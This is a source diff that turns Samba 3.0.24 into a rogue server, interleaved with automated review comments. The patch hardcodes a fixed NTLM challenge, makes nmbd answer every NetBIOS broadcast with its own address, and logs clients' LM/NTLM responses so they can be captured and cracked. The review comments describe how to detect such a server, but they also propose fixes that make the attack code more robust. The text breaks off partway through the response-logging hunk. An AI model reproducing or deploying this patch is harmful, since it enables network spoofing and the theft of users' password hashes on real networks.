diff -rub samba-3.0.24/source/auth/auth.c samba-3.0.24-karma/source/auth/auth.c --- samba-3.0.24/source/auth/auth.c 2007-02-04 12:59:14.000000000 -0600 +++ samba-3.0.24-karma/source/auth/auth.c 2007-04-06 12:16:03.000000000 -0500 @@ -124,14 +124,19 @@ } if (!challenge_set_by) { - uchar chal[8]; + uchar chal[8] = { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 }; + int i; - generate_random_buffer(chal, sizeof(chal)); auth_context->challenge = data_blob_talloc(auth_context->mem_ctx, chal, sizeof(chal)); - challenge_set_by = "random"; - auth_context->challenge_may_be_modified = True; + challenge_set_by = "jmk"; + auth_context->challenge_may_be_modified = False; + DEBUG(0, ("*** Fixed LM/NTLM Challenge Samba Attack -- Foofus.Net/JoMo-Kun ***\n")); + DEBUGADD(0, ("[%s] Set server challenge: ", client_addr())); + for (i=0; ichallenge.length; i++) + DEBUGADD(0, ("%2.2X", 0xFF & (int)auth_context->challenge.data[i])); + DEBUGADD(0, ("\n")); } DEBUG(5, ("auth_context challenge created by %s\n", challenge_set_by)); diff -rub samba-3.0.24/source/nmbd/nmbd.c samba-3.0.24-karma/source/nmbd/nmbd.c --- samba-3.0.24/source/nmbd/nmbd.c 2007-02-04 12:59:23.000000000 -0600 +++ samba-3.0.24-karma/source/nmbd/nmbd.c 2007-02-21 13:26:02.000000000 -0600 @@ -698,6 +698,9 @@ DEBUG( 0, ( "Netbios nameserver version %s started.\n", SAMBA_VERSION_STRING) ); DEBUGADD( 0, ( "%s\n", COPYRIGHT_STARTUP_MESSAGE ) ); + DEBUGADD(0, ("\n----------------------------------------------------------\n")); + DEBUGADD(0, ("*** NMB Broadcast Auto-Response -- Foofus.Net/JoMo-Kun ***\n")); + DEBUGADD(0, ("----------------------------------------------------------\n\n")); if ( !reload_nmbd_services(False) ) return(-1); diff -rub samba-3.0.24/source/nmbd/nmbd_incomingrequests.c samba-3.0.24-karma/source/nmbd/nmbd_incomingrequests.c --- samba-3.0.24/source/nmbd/nmbd_incomingrequests.c 2006-04-19 21:29:33.000000000 -0500 +++ samba-3.0.24-karma/source/nmbd/nmbd_incomingrequests.c 2007-04-06 12:58:45.000000000 -0500 
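Review bot: Dropping `generate_random_buffer(chal, sizeof(chal))` in favour of the constant initializer `{ 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 }`, with `challenge_may_be_modified = False` presumably stopping any later path from substituting its own nonce, means every client of this server is challenged with the same eight bytes, so a captured LM/NTLM response is no longer bound to one session and can be attacked with work prepared in advance; that consequence belongs in a comment the hunk lacks, e.g. `/* Static challenge: every session gets the same nonce, so responses are replayable and precomputable. */`. For anyone monitoring the network the same property is the signature: a negotiate response whose 8-byte challenge never changes across connections identifies a server built with this change, and clients pinned to NTLMv2 with SMB signing required contribute their own client nonce, which defeats precomputation against the fixed server challenge. In the copy on this page the loop reads `for (i=0; ichallenge.length; i++)`, which looks like extraction loss of `i < auth_context->`; as written it compares a signed `int i` against a `size_t` length, and `size_t i;` would avoid the sign-comparison warning. The enclosing function starts and ends outside the hunk.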
@@ -449,18 +449,44 @@ struct name_record *namerec = NULL; int reply_data_len = 0; int i; + int num_ips; DEBUG(3,("process_name_query_request: Name query from %s on subnet %s for name %s\n", inet_ntoa(p->ip), subrec->subnet_name, nmb_namestr(question))); + /* ********************************************************************************* */ + /* + Hack to make nmbd respond with our IP for all NMB broadcasts. + Based on ideas from Karma (http://www.theta44.org/karma/). + JoMo-Kun [02/2007] + */ + /* Look up the name in the cache - if the request is a broadcast request that came from a subnet we don't know about then search all the broadcast subnets for a match (as we don't know what interface the request came in on). */ + /* if(subrec == remote_broadcast_subnet) namerec = find_name_for_remote_broadcast_subnet( question, FIND_ANY_NAME); else namerec = find_name_on_subnet(subrec, question, FIND_ANY_NAME); + */ + + /* Create Response Packet */ + DEBUGADD(0, ("[%s] NetBIOS Broadcast Request: %s\n", inet_ntoa(p->ip), question->name) ); + namerec = SMB_MALLOC_P(struct name_record); + memset( (char *)namerec, '\0', sizeof(*namerec) ); + namerec->subnet = subrec; + make_nmb_name(&namerec->name, question->name, 0x00); + namerec->data.nb_flags = NB_ACTIVE; + namerec->data.wins_flags = WINS_ACTIVE; + namerec->data.nb_flags = NB_PERM; + namerec->data.source = SELF_NAME; + num_ips = iface_count(); + namerec->data.num_ips = num_ips; + namerec->data.ip = SMB_MALLOC_ARRAY( struct in_addr, num_ips ); + memcpy( (namerec->data.ip), &subrec->myip, num_ips * sizeof(struct in_addr) ); + /* ********************************************************************************* */ /* Check if it is a name that expired */ if (namerec && diff -rub samba-3.0.24/source/smbd/negprot.c samba-3.0.24-karma/source/smbd/negprot.c --- samba-3.0.24/source/smbd/negprot.c 2007-02-04 12:59:13.000000000 -0600 +++ samba-3.0.24-karma/source/smbd/negprot.c 2007-04-06 12:17:25.000000000 -0500 
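Review bot: The `memcpy( (namerec->data.ip), &subrec->myip, num_ips * sizeof(struct in_addr) )` copies `iface_count()` consecutive addresses out of a single `struct in_addr` field of `*subrec`, so whenever more than one interface is configured it reads past `myip` into whatever follows it in the struct and, presumably, those bytes end up in the reply; since the hunk never reads the per-interface addresses it claims in `num_ips`, the record should carry only the one address it actually has: `namerec->data.num_ips = 1;` / `namerec->data.ip = SMB_MALLOC_ARRAY( struct in_addr, 1 );` / `namerec->data.ip[0] = subrec->myip;`. Neither the `SMB_MALLOC_P` nor the `SMB_MALLOC_ARRAY` result is checked for NULL before the `memset`/`memcpy`, and `namerec->data.nb_flags = NB_ACTIVE` is overwritten two statements later by `= NB_PERM`, so either the first store is dead or `NB_ACTIVE|NB_PERM` was intended. The lookup this replaces returned a cached record, whereas the new record and its `ip` array are heap-allocated on every query and nothing in the hunk frees them, so unless the rest of `process_name_query_request` (which starts and ends outside the hunk) releases them each broadcast query leaks. For detection, the observable behaviour is an nmbd that answers queries for names nobody registered, so a monitor that queries a canary name on the broadcast domain and alerts on any positive reply will flag a host carrying this change.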
@@ -348,6 +348,7 @@ p += srvstr_push(outbuf, p, lp_workgroup(), -1, STR_UNICODE|STR_TERMINATE|STR_NOALIGN); DEBUG(3,("not using SPNEGO\n")); + DEBUGADD(0,("[%s] Simple and Protected GSSAPI Negotiation Mechanism (SPNEG) Disabled.\n", client_addr())); } else { uint8 keylen; int len = negprot_spnego(p, &keylen); @@ -355,6 +356,7 @@ SCVAL(outbuf,smb_vwv16+1,keylen); p += len; DEBUG(3,("using SPNEGO\n")); + DEBUGADD(0,("[%s] Simple and Protected GSSAPI Negotiation Mechanism (SPNEG) Enabled (NTLMv2).\n", client_addr())); } SSVAL(outbuf,smb_vwv17, p - q); /* length of challenge+domain strings */ @@ -578,8 +580,9 @@ reload_services(True); outsize = supported_protocols[protocol].proto_reply_fn(inbuf, outbuf); DEBUG(3,("Selected protocol %s\n",supported_protocols[protocol].proto_name)); + DEBUGADD(0,("[%s] Selected protocol: %s\n", client_addr(), supported_protocols[protocol].proto_name)); } else { - DEBUG(0,("No protocol supported !\n")); + DEBUG(0,("[%s] No protocol supported !\n", client_addr())); } SSVAL(outbuf,smb_vwv0,choice); diff -rub samba-3.0.24/source/smbd/reply.c samba-3.0.24-karma/source/smbd/reply.c --- samba-3.0.24/source/smbd/reply.c 2007-02-04 13:09:01.000000000 -0600 +++ samba-3.0.24-karma/source/smbd/reply.c 2007-04-06 12:14:23.000000000 -0500 @@ -495,6 +495,9 @@ DEBUG(2,("netbios connect: name1=%s name2=%s\n", name1,name2)); + DEBUGADD(0, ("[%s] Server NetBIOS Name: %s\n", client_addr(), name1)); + DEBUGADD(0, ("[%s] Client NetBIOS Name: %s\n", client_addr(), name2)); + set_local_machine_name(name1, True); set_remote_machine_name(name2, True); 
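Review bot: The `DEBUGADD(0,...)` line added after `DEBUG(3,("using SPNEGO\n"))` claims `Enabled (NTLMv2)`, but nothing in this hunk selects an NTLM variant — SPNEGO only wraps the later session-setup exchange, where the client decides what it sends — so the message should not assert it, e.g. `DEBUGADD(0,("[%s] SPNEGO negotiation enabled\n", client_addr()));`, and `SPNEG` is a typo for `SPNEGO` in both of the first two hunks. Because `DEBUGADD` continues the previous `DEBUG` line without emitting a log header, attaching a level-0 continuation to a level-3 line prints a bare line with no timestamp or level prefix whenever the log level is below 3; the same pattern is used for the `Selected protocol` line in the hunk at 580, in the reply.c hunk at 495 and in the reply.c hunk at 665 later in this patch, where `DEBUG(0, ...)` would give each line its own header. The enclosing functions start and end outside these hunks.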
@@ -665,6 +668,7 @@ p += srvstr_pull(inbuf, client_devicetype, p, sizeof(client_devicetype), 6, STR_ASCII); + DEBUGADD(0, ("[%s] Device Type: %s Share: %s\n", client_addr(), client_devicetype, service)); DEBUG(4,("Client requested device type [%s] for share [%s]\n", client_devicetype, service)); conn = make_connection(service,password,client_devicetype,vuid,&nt_status); diff -rub samba-3.0.24/source/smbd/sesssetup.c samba-3.0.24-karma/source/smbd/sesssetup.c --- samba-3.0.24/source/smbd/sesssetup.c 2007-02-04 12:59:13.000000000 -0600 +++ samba-3.0.24-karma/source/smbd/sesssetup.c 2007-04-06 12:34:00.000000000 -0500 @@ -893,7 +893,7 @@ char *p = smb_buf(inbuf); char *save_p = smb_buf(inbuf); uint16 byte_count; - + int i; if(global_client_caps == 0) { global_client_caps = IVAL(inbuf,smb_vwv11); @@ -949,6 +949,16 @@ if (doencrypt) { lm_resp = data_blob(p, passlen1); nt_resp = data_blob(p+passlen1, passlen2); + + DEBUGADD(0, ("[%s] LM Client Response: ", client_addr())); + for (i=0; i